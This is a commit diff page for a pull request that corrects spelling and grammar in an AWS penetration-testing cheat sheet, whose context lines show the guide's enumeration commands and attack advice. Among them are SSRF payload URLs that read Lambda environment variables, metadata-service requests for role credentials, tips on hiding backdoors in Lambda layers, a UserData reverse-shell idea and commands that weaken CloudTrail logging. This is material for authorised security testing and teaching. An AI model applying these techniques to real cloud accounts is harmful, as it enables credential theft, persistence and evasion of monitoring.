Merge pull request #1 from ShubhamJagtap2000/ShubhamJagtap2000-update-docs
Update AWS Pentest.mdpull/2/head
commit
1d5f4ccb45
|
@ -795,10 +795,10 @@ arn:aws:iam:100:user/admin
|
||||||
* It's assumed that we have gain access to the AWS Credentials
|
* It's assumed that we have gain access to the AWS Credentials
|
||||||
* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**)
|
* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**)
|
||||||
* Always look for policies and roles with the * symbol.
|
* Always look for policies and roles with the * symbol.
|
||||||
* See which user do not have MFA enabled
|
* See which user do not have MFA enabled
|
||||||
* User enumeration in IAM Panel and group enumeration
|
* User enumeration in IAM Panel and group enumeration
|
||||||
* We can also enumerate roles from the same interface
|
* We can also enumerate roles from the same interface
|
||||||
* Root user is super admin
|
* Root user is super admin
|
||||||
|
|
||||||
## Configure AWS cli
|
## Configure AWS cli
|
||||||
|
|
||||||
|
@ -840,7 +840,7 @@ aws iam list-users
|
||||||
aws iam list-groups-for-user --user-name user-name
|
aws iam list-groups-for-user --user-name user-name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing all manages policies that are attached to the specified IAM user
|
### Listing all managed policies that are attached to the specified IAM user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name user-name
|
aws iam list-attached-user-policies --user-name user-name
|
||||||
|
@ -872,7 +872,7 @@ aws iam list-attached-group-policies --group-name group-name
|
||||||
aws iam list-group-policies --group-name group name
|
aws iam list-group-policies --group-name group name
|
||||||
```
|
```
|
||||||
|
|
||||||
## 3. Enumeratig Roles
|
## 3. Enumerating Roles
|
||||||
|
|
||||||
### Listing IAM Roles
|
### Listing IAM Roles
|
||||||
|
|
||||||
|
@ -880,7 +880,7 @@ aws iam list-group-policies --group-name group name
|
||||||
aws iam list-roles
|
aws iam list-roles
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listsing all managed policies that are attached to the specified IAM role
|
### Listing all managed policies that are attached to the specified IAM role
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-role-policies --role-name role-name
|
aws iam list-attached-role-policies --role-name role-name
|
||||||
|
@ -972,13 +972,13 @@ https://account-id-here.signin.aws.amazon.com/console
|
||||||
aws sts get-caller-identity
|
aws sts get-caller-identity
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Listing policies attached to an user
|
2. Listing policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name example_name -- profile example_profile
|
aws iam list-attached-user-policies --user-name example_name -- profile example_profile
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Retrieving informations about an specific policy
|
3. Retrieving information about a specific policy
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy --policy-arn policy_arn
|
aws iam get-policy --policy-arn policy_arn
|
||||||
|
@ -996,7 +996,7 @@ Now we can finally retrieve the contents of the policy
|
||||||
aws iam get-policy-version --policy-arn example_arn --version-id id_example
|
aws iam get-policy-version --policy-arn example_arn --version-id id_example
|
||||||
```
|
```
|
||||||
|
|
||||||
*It's important to use the command above to chech the information about the default policy*
|
*It's important to use the command above to check the information about the default policy*
|
||||||
|
|
||||||
4. Escalation
|
4. Escalation
|
||||||
|
|
||||||
|
@ -1082,13 +1082,13 @@ aws sts get-caller-identity --profile example_profile
|
||||||
#### Accessing more credentials
|
#### Accessing more credentials
|
||||||
* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)
|
* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)
|
||||||
|
|
||||||
##### Listing managed policies attached to an user
|
##### Listing managed policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name example_name
|
aws iam list-attached-user-policies --user-name example_name
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Retrieving information about an specific policy
|
##### Retrieving information about a specific policy
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy --policy-arn ARN
|
aws iam get-policy --policy-arn ARN
|
||||||
|
@ -1100,7 +1100,7 @@ aws iam get-policy --policy-arn ARN
|
||||||
aws iam list-policy-versions --policy-arn ARN
|
aws iam list-policy-versions --policy-arn ARN
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Retrieving information about an specific version
|
##### Retrieving information about a specific version
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
||||||
|
@ -1112,7 +1112,7 @@ aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
||||||
aws iam list-roles
|
aws iam list-roles
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Listing trust relashionship between role and user (Which roles we can assume)
|
##### Listing trust relationship between role and user (Which roles we can assume)
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-role --role-name role_name
|
aws iam get-role --role-name role_name
|
||||||
|
@ -1152,12 +1152,12 @@ aws sts get-caller-identity
|
||||||
|
|
||||||
## S3 - Simple Storage System
|
## S3 - Simple Storage System
|
||||||
|
|
||||||
* Storage system that allow users to store and retrieve data.
|
* Storage system that allows users to store and retrieve data.
|
||||||
* List,Get,Put and Delete operations can be performed on the objects of the bucket
|
* List,Get,Put and Delete operations can be performed on the objects of the bucket
|
||||||
* Buckets are global, meaning that they are available to all regions
|
* Buckets are global, meaning that they are available to all regions
|
||||||
* It's possible to bruteforce the bucket name and region in the URL
|
* It's possible to bruteforce the bucket name and region in the URL
|
||||||
* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level
|
* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level
|
||||||
* There is also time limited URL's and identity based policies
|
* There is also time limited URL's and identity-based policies
|
||||||
* Identity policies are enumerated using IAM commands
|
* Identity policies are enumerated using IAM commands
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
@ -1192,7 +1192,7 @@ aws s3api get-public-access-block --bucket name
|
||||||
aws s3api list-objects --bucket name
|
aws s3api list-objects --bucket name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting ACL information about specific object
|
### Getting ACL information about a specific object
|
||||||
|
|
||||||
```
|
```
|
||||||
aws s3api get-object-acl --bucket-name name --key object_name
|
aws s3api get-object-acl --bucket-name name --key object_name
|
||||||
|
@ -1218,7 +1218,7 @@ aws s3api get-object --bucket name --key object-name download-file-location
|
||||||
|
|
||||||
### Time-Based Url
|
### Time-Based Url
|
||||||
|
|
||||||
* Generate a time based url for an object
|
* Generate a time-based url for an object
|
||||||
* Userful if the object is not public
|
* Userful if the object is not public
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -1226,7 +1226,7 @@ aws s3 presign s3://bucket-name/object-name --expires-in 605000
|
||||||
```
|
```
|
||||||
|
|
||||||
## Lambda & API Gateway
|
## Lambda & API Gateway
|
||||||
* Serverless event driven platform
|
* Serverless event-driven platform
|
||||||
* Runs code in response to events and automatically manages computing resources required by that code
|
* Runs code in response to events and automatically manages computing resources required by that code
|
||||||
* Can trigger from other AWS services or call directly from the API Gateway
|
* Can trigger from other AWS services or call directly from the API Gateway
|
||||||
* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source
|
* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source
|
||||||
|
@ -1257,7 +1257,7 @@ aws lambda get-function --function-name function_name
|
||||||
aws lambda get-policy --function-name function_name
|
aws lambda get-policy --function-name function_name
|
||||||
```
|
```
|
||||||
|
|
||||||
* We can get informations like who can execute this functions, ID and other informations with this command
|
* We can get information like who can execute this functions, ID and other information with this command
|
||||||
|
|
||||||
### Listing the event source mapping information about a lambda function
|
### Listing the event source mapping information about a lambda function
|
||||||
|
|
||||||
|
@ -1335,15 +1335,15 @@ aws apigateway get-api-key --api-key KEY
|
||||||
|
|
||||||
## Initial Access
|
## Initial Access
|
||||||
|
|
||||||
* Its possible to get RCE through API Gateway if it executes commands.
|
* It's possible to get RCE through API Gateway if it executes commands.
|
||||||
* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation.
|
* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env`, configure `aws cli` and proceed with the exploitation.
|
||||||
|
|
||||||
## Credential Access
|
## Credential Access
|
||||||
|
|
||||||
Getting credentials from Lambda can be done in 2 ways
|
Getting credentials from Lambda can be done in 2 ways
|
||||||
|
|
||||||
1. Keys in the source code
|
1. Keys in the source code
|
||||||
2. Keys in the enviroment variables
|
2. Keys in the environment variables
|
||||||
|
|
||||||
These keys can be gathered using SSRF, RCE and so on.
|
These keys can be gathered using SSRF, RCE and so on.
|
||||||
|
|
||||||
|
@ -1365,7 +1365,7 @@ https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/inv
|
||||||
https://apigateway/prod/system?cmd=file:///proc/self/environ
|
https://apigateway/prod/system?cmd=file:///proc/self/environ
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting credentials from lambda enviroment variables (cli)
|
### Getting credentials from lambda environment variables (cli)
|
||||||
|
|
||||||
```
|
```
|
||||||
aws lambda get-function --function-name NAME
|
aws lambda get-function --function-name NAME
|
||||||
|
@ -1374,8 +1374,8 @@ aws lambda get-function --function-name NAME
|
||||||
* It's important to enumerate the functions first with `aws lambda list-functions`
|
* It's important to enumerate the functions first with `aws lambda list-functions`
|
||||||
|
|
||||||
## Persistence
|
## Persistence
|
||||||
* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute.
|
* If the user has sufficient rights in the lambda function, it's possible to download the source code, add a backdoor to it and upload. Every time the lambda executes, the malicious code will also execute.
|
||||||
* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.
|
* Always try to update the code of layers (dependencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.
|
||||||
|
|
||||||
### Checking which user is executing
|
### Checking which user is executing
|
||||||
|
|
||||||
|
@ -1525,8 +1525,8 @@ aws iam list-attached-user-policies --user-name user_name
|
||||||
|
|
||||||
## AWS Secret Manager
|
## AWS Secret Manager
|
||||||
|
|
||||||
* AWS Service that encrypts and store secrets
|
* AWS Service that encrypts and stores secrets
|
||||||
* Transparently decrypts and return in plaintext
|
* Transparently decrypts and returns in plaintext
|
||||||
* KMS used to store keys (AWS Key and Customer Managed Key)
|
* KMS used to store keys (AWS Key and Customer Managed Key)
|
||||||
* Asymmetric and Symmetric keys can be created using KMS
|
* Asymmetric and Symmetric keys can be created using KMS
|
||||||
|
|
||||||
|
@ -1581,13 +1581,13 @@ aws kms get-key-policy --policy-name name --key-id ID
|
||||||
|
|
||||||
* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API
|
* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API
|
||||||
|
|
||||||
### Listing policies attached to an user
|
### Listing policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name name
|
aws iam list-attached-user-policies --user-name name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Retrieving information about a specific version of policy
|
### Retrieving information about a specific version of the policy
|
||||||
|
|
||||||
* Here we can see the permissions
|
* Here we can see the permissions
|
||||||
|
|
||||||
|
@ -1595,7 +1595,7 @@ aws iam list-attached-user-policies --user-name name
|
||||||
aws iam get-policy-version --policy-arn arn --version-id id
|
aws iam get-policy-version --policy-arn arn --version-id id
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing all secrets stored by Secret Manager
|
### Listing all secrets stored by the Secret Manager
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager list-secrets
|
aws secretsmanager list-secrets
|
||||||
|
@ -1603,13 +1603,13 @@ aws secretsmanager list-secrets
|
||||||
|
|
||||||
### Listing information about a specific secret
|
### Listing information about a specific secret
|
||||||
|
|
||||||
* Here we get the secret Key Id to descript the secret
|
* Here we get the secret Key Id to describe the secret
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager describe-secret --secret-id name
|
aws secretsmanager describe-secret --secret-id name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting resource-based policy attached to an specific secret
|
### Getting resource-based policy attached to a specific secret
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager get-resource-policy --secret-id ID
|
aws secretsmanager get-resource-policy --secret-id ID
|
||||||
|
@ -1627,13 +1627,13 @@ aws secretsmanager get-secret-value --secret-id ID
|
||||||
|
|
||||||
* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.
|
* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.
|
||||||
|
|
||||||
#### Listing an specific key
|
#### Listing a specific key
|
||||||
|
|
||||||
```
|
```
|
||||||
aws kms describe-key --key-id id
|
aws kms describe-key --key-id id
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing policies attached to an specified key
|
#### Listing policies attached to a specified key
|
||||||
|
|
||||||
* Here we can see who can access the key, the description of it and so on
|
* Here we can see who can access the key, the description of it and so on
|
||||||
|
|
||||||
|
@ -1651,7 +1651,7 @@ aws kms get-key-policy --policy-name name --key-id ID
|
||||||
|
|
||||||
#### Decrypt the secret using the key
|
#### Decrypt the secret using the key
|
||||||
|
|
||||||
* There is no need to specificy the key information because this information is embbeded in the encrypted file
|
* There is no need to specify the key information because this information is embedded in the encrypted file
|
||||||
|
|
||||||
```
|
```
|
||||||
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
|
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
|
||||||
|
@ -1662,14 +1662,14 @@ aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query pl
|
||||||
Divided into three categories
|
Divided into three categories
|
||||||
|
|
||||||
* Registry -> Secure place to store container images (ECR)
|
* Registry -> Secure place to store container images (ECR)
|
||||||
* Orchestration -> Configure when and where the containters run (ECS,EKS)
|
* Orchestration -> Configure when and where the containers run (ECS, EKS)
|
||||||
* Compute -> Use to do computing related tasks (EC2, Fargate)
|
* Compute -> Use to do computing-related tasks (EC2, Fargate)
|
||||||
* Its possible to create a backdoor image and add to a EKS cluster
|
* Is it possible to create a backdoor image and add to a EKS cluster
|
||||||
* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster
|
* Always look how VPC's are communicating with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster
|
||||||
|
|
||||||
## Initial Access
|
## Initial Access
|
||||||
|
|
||||||
* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2.
|
* The initial access can be done by exploiting some RCE in web app to get access to the container, afterwards it's possible to compromise the EC2.
|
||||||
|
|
||||||
After the RCE, we can list all secrets in EKS
|
After the RCE, we can list all secrets in EKS
|
||||||
|
|
||||||
|
@ -1721,19 +1721,19 @@ aws ecr describe-images --repository-name name --images-ids imageTag=name
|
||||||
aws ecs list-clusters
|
aws ecs list-clusters
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific cluster
|
#### Listing information about a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs describe-clusters --cluster name
|
aws ecs describe-clusters --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing all services in specified cluster
|
#### Listing all services in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-services --cluster name
|
aws ecs list-services --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific service
|
#### Listing information about a specific service
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs descibe-services --cluster name --services name
|
aws ecs descibe-services --cluster name --services name
|
||||||
|
@ -1741,13 +1741,13 @@ aws ecs descibe-services --cluster name --services name
|
||||||
|
|
||||||
* This command shows the logs of the service
|
* This command shows the logs of the service
|
||||||
|
|
||||||
#### Listing tasks in specific cluster
|
#### Listing tasks in a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-tasks --cluster name
|
aws ecs list-tasks --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific task
|
#### Listing information about a specific task
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs describe-tasks --cluster name -tasks taskArn
|
aws ecs describe-tasks --cluster name -tasks taskArn
|
||||||
|
@ -1755,7 +1755,7 @@ aws ecs describe-tasks --cluster name -tasks taskArn
|
||||||
|
|
||||||
* Also shows information about network, userful if trying to pivot
|
* Also shows information about network, userful if trying to pivot
|
||||||
|
|
||||||
#### Listing all containers in specified cluster
|
#### Listing all containers in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-container-instances --cluster name
|
aws ecs list-container-instances --cluster name
|
||||||
|
@ -1769,13 +1769,13 @@ aws ecs list-container-instances --cluster name
|
||||||
aws eks list-clusters
|
aws eks list-clusters
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific cluster
|
#### Listing information about a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks describe-cluster --name name
|
aws eks describe-cluster --name name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing all node groups in specified cluster
|
#### Listing all node groups in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks list-nodegroups --cluster-name name
|
aws eks list-nodegroups --cluster-name name
|
||||||
|
@ -1787,7 +1787,7 @@ aws eks list-nodegroups --cluster-name name
|
||||||
aws eks describe-nodegroup --cluster-name name --nodegroup-name name
|
aws eks describe-nodegroup --cluster-name name --nodegroup-name name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing Fargate in specified cluster
|
#### Listing Fargate in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks list-fargate-profiles --cluster-name cluster-name
|
aws eks list-fargate-profiles --cluster-name cluster-name
|
||||||
|
@ -1952,7 +1952,7 @@ X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-tt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Privilege Escalation
|
### Privilege Escalation
|
||||||
* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection.
|
* One approach to get a shell in an instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection.
|
||||||
* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.
|
* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.
|
||||||
|
|
||||||
#### Getting information about the key
|
#### Getting information about the key
|
||||||
|
@ -2014,7 +2014,7 @@ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PR
|
||||||
aws configure
|
aws configure
|
||||||
```
|
```
|
||||||
|
|
||||||
Or use enviroment variables.
|
Or use environment variables.
|
||||||
|
|
||||||
### Persistence
|
### Persistence
|
||||||
* All the persistence techniques works here, SSH persistence, vim backdoor and so on.
|
* All the persistence techniques works here, SSH persistence, vim backdoor and so on.
|
||||||
|
@ -2108,7 +2108,7 @@ After mounting, we will have access to the disk.
|
||||||
|
|
||||||
* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)
|
* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)
|
||||||
* The access is done by using password, password+IAM or password+kerberos
|
* The access is done by using password, password+IAM or password+kerberos
|
||||||
* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip.
|
* It's possible to restrict access using restrictions such as specific EC2 or lambda or use network-level restrictions such as vpc, ip.
|
||||||
* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.
|
* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
@ -2161,7 +2161,7 @@ aws rds describe-db-instances
|
||||||
aws ec2 describe-security-groups --group-ids id
|
aws ec2 describe-security-groups --group-ids id
|
||||||
```
|
```
|
||||||
|
|
||||||
### Password based authentication
|
### Password-based authentication
|
||||||
|
|
||||||
```
|
```
|
||||||
mysql -h hostname -u name -P port -p password
|
mysql -h hostname -u name -P port -p password
|
||||||
|
@ -2209,16 +2209,16 @@ mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --passwo
|
||||||
|
|
||||||
## Single Sign On (SSO)
|
## Single Sign On (SSO)
|
||||||
|
|
||||||
* Used to centrally manage access to multiple AWS accounts and applications.
|
* Used to manage access to multiple AWS accounts and applications centrally.
|
||||||
* Provide users a way to interact with all services and applications through one place
|
* Provide users a way to interact with all services and applications through one place
|
||||||
* Can be used to manage access and user permissions to all AWS accounts
|
* Can be used to manage access and user permissions to all AWS accounts
|
||||||
* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar)
|
* The identity source can use AWS SSO's identity store or external identity store (Okta, SAML and similar)
|
||||||
|
|
||||||
## CloudTrail
|
## CloudTrail
|
||||||
|
|
||||||
* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account
|
* Log monitoring service, allows us to continuously monitor and retain account activity related to actions in our AWS account
|
||||||
* Provide event history of AWS account activity, SDKs, command line tools and other services
|
* Provide event history of AWS account activity, SDKs, command line tools and other services
|
||||||
* Commonly used to detect unsual behavior in AWS account
|
* Commonly used to detect unusual behavior in AWS account
|
||||||
* Pacu automatically changes the user agent to deceive the logs of cloudtrail
|
* Pacu automatically changes the user agent to deceive the logs of cloudtrail
|
||||||
|
|
||||||
### Userful Commands
|
### Userful Commands
|
||||||
|
@ -2256,7 +2256,7 @@ aws cloudtrail update-trail --name example_trail --no-include-global-service-eve
|
||||||
|
|
||||||
* Used to protect applications against common web application attacks
|
* Used to protect applications against common web application attacks
|
||||||
* Common WAF bypasses can be tested against it
|
* Common WAF bypasses can be tested against it
|
||||||
* To detect an WAF, we can use `wafw00f`
|
* To detect a WAF, we can use `wafw00f`
|
||||||
|
|
||||||
## AWS Inspector
|
## AWS Inspector
|
||||||
|
|
||||||
|
@ -2271,12 +2271,12 @@ aws cloudtrail update-trail --name example_trail --no-include-global-service-eve
|
||||||
## Virtual Private Cloud
|
## Virtual Private Cloud
|
||||||
|
|
||||||
* Used to create an isolated infrastructure within the cloud, including subnets and so on.
|
* Used to create an isolated infrastructure within the cloud, including subnets and so on.
|
||||||
* If the VPC has an internet gateway, means its a public subnet
|
* If the VPC has an internet gateway, means it is a public subnet
|
||||||
* Every VPC can have Network ACL's
|
* Every VPC can have Network ACL's
|
||||||
|
|
||||||
## Routing Tables
|
## Routing Tables
|
||||||
|
|
||||||
A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows
|
A set of rules to determine where the traffic will be directed, comes in the form of Destination and Target, defined as follows
|
||||||
|
|
||||||
```
|
```
|
||||||
DESTINATION TARGET
|
DESTINATION TARGET
|
||||||
|
@ -2292,7 +2292,7 @@ IP eni -> Network Interface
|
||||||
|
|
||||||
* VPC Internal -> Internal IP, no internet connection
|
* VPC Internal -> Internal IP, no internet connection
|
||||||
* Internet Gateway -> Used to access the internet
|
* Internet Gateway -> Used to access the internet
|
||||||
* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet
|
* NAT Gateway -> Does the NAT between machines, allows one-way connection to the internet
|
||||||
* VPC Peering -> Allows the communication between 2 VPC's
|
* VPC Peering -> Allows the communication between 2 VPC's
|
||||||
* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)
|
* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)
|
||||||
* VPN Gateway -> Used to expand the cloud to on premises and vice-versa
|
* VPN Gateway -> Used to expand the cloud to on premises and vice-versa
|
||||||
|
@ -2306,7 +2306,7 @@ IP eni -> Network Interface
|
||||||
aws ec2 describe-vpcs
|
aws ec2 describe-vpcs
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing VPC's specifing the region
|
### Listing VPC's specifying the region
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-vpcs --region us-west-1
|
aws ec2 describe-vpcs --region us-west-1
|
||||||
|
@ -2318,13 +2318,13 @@ aws ec2 describe-vpcs --region us-west-1
|
||||||
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
|
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing subnet's
|
### Listing subnets
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-subnets
|
aws ec2 describe-subnets
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing subnet's by VPC-id
|
### Listing subnets by VPC-id
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
|
aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
|
||||||
|
@ -2407,4 +2407,4 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
|
||||||
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
||||||
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
|
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
|
||||||
* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
|
* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
|
||||||
* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)
|
* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)
|
||||||
|
|
Loading…
Reference in New Issue